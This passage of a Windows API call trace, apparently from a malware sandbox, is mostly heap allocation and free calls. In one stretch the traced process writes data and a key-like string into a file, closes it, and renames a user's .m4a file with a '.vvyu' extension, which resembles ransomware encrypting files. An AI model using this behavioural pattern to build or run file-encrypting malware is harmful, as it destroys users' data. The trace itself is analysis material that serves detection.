dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0195.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63e0 [0195.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6470 [0195.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0195.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6440 [0195.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6428 [0195.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6488 [0195.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0195.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6428 [0195.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0195.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0195.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0195.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0195.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0195.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63f8 [0195.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0195.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0195.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0195.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0195.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0195.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0195.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0195.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0195.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0195.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0195.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0195.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0195.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0195.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0195.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0195.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0195.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0195.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0195.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0195.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0195.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0195.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0195.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae22a8 | out: hHeap=0x2c0000) returned 1 [0195.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0195.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0195.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0195.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0195.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0195.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.218] WriteFile (in: hFile=0x584, lpBuffer=0x2ae9ea0*, nNumberOfBytesToWrite=0x1685, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae9ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x1685, lpOverlapped=0x0) returned 1 [0195.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae9ea0 | out: hHeap=0x2c0000) returned 1 [0195.219] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x168a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.219] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0195.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0195.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0195.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.220] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.221] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.221] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.221] CloseHandle (hObject=0x584) returned 1 [0195.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0195.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.223] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\uDCO8hlR7krD.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\5u0vvnc3nroc8n_z\\udco8hlr7krd.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\uDCO8hlR7krD.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\5u0vvnc3nroc8n_z\\udco8hlr7krd.m4a.vvyu")) returned 1 [0195.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.225] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0195.228] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x402974f0, ftCreationTime.dwHighDateTime=0x1d8a11a, ftLastAccessTime.dwLowDateTime=0x4903a3a0, ftLastAccessTime.dwHighDateTime=0x1d8a3ab, ftLastWriteTime.dwLowDateTime=0x4903a3a0, ftLastWriteTime.dwHighDateTime=0x1d8a3ab, nFileSizeHigh=0x0, nFileSizeLow=0x168a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uDCO8hlR7krD.m4a", cAlternateFileName="UDCO8H~1.M4A")) returned 0 [0195.228] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0195.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0195.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0195.229] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0195.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0195.229] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0195.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0195.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0195.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 